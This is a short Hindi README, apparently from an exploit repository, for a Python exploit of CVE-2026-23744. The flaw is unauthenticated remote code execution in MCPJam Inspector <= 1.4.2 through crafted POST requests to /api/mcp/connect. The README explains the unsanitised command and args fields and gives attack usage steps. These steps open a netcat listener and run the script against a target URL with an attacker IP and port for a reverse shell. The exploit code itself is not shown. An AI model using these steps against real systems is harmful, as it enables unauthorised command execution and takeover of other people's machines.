
CVE-2026-23744 के लिए Python शोषण, जो MCPJam Inspector <= 1.4.2 में /api/mcp/connect एंडपॉइंट पर तैयार किए गए POST अनुरोधों के माध्यम से रिमोट कोड निष्पादन प्राप्त करता है।
MCPJam Inspector <= 1.4.2 में एक महत्वपूर्ण RCE कमजोरी संभव है जब /api/mcp/connect एंडपॉइंट डिफ़ॉल्ट रूप से सभी नेटवर्क इंटरफेस (0.0.0.0) पर सुनता है और serverConfig JSON ऑब्जेक्ट में command और args पैरामीटर को पास किए गए उपयोगकर्ता-आपूर्ति किए गए इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है।
एक हमलावर /api/mcp/connect पर एक निर्मित POST अनुरोध भेजकर इस कमजोरी का शोषण कर सकता है, जिससे लक्ष्य प्रणाली पर MCPJam सेवा के विशेषाधिकारों के साथ मनमाना कमांड निष्पादन प्राप्त होता है।
pip install request
sudo nc -lvnp <port>
python3 CVE-2026-23744.py -u <url> -i <attacker-ip> -p <attacker-port>
उदाहरण